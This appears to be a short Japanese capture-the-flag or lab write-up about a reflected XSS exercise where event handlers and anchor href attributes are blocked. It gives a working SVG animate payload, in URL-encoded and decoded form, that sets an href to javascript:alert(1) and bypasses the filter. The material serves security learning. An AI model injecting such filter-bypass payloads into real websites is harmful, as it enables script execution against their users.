Hello there, ('ω')ノ
イベントハンドラとhref属性がブロックされた反映XSSを。
すべてのイベントとアンカーhref属性がブロックされているとのこと。
クリックするとアラート機能を呼び出すベクトルを注入するXSSを実行せよと。
ますは、下記でURLでパラメータの確認を。
?search=test
下記を挿入せよとのことで、URLデコードして内容を確認して。
?search=%3Csvg%3E%3Ca%3E%3Canimate+attributeName%3Dhref+values%3Djavascript%3Aalert(1)+%2F%3E%3Ctext+x%3D20+y%3D20%3EClick%20me%3C%2Ftext%3E%3C%2Fa%3E
下記は、URLデコードした結果で。
?search=<svg><a><animate attributeName=href values=javascript:alert(1) /><text x=20 y=20>Click me</text></a>
どちらのパラメータでも実行可能で。
クリアできた。
ちなみにリクエストは、下記のとおりで。
2つのリクエストを比較した結果は、下記のとおりで。
Best regards, (^^ゞ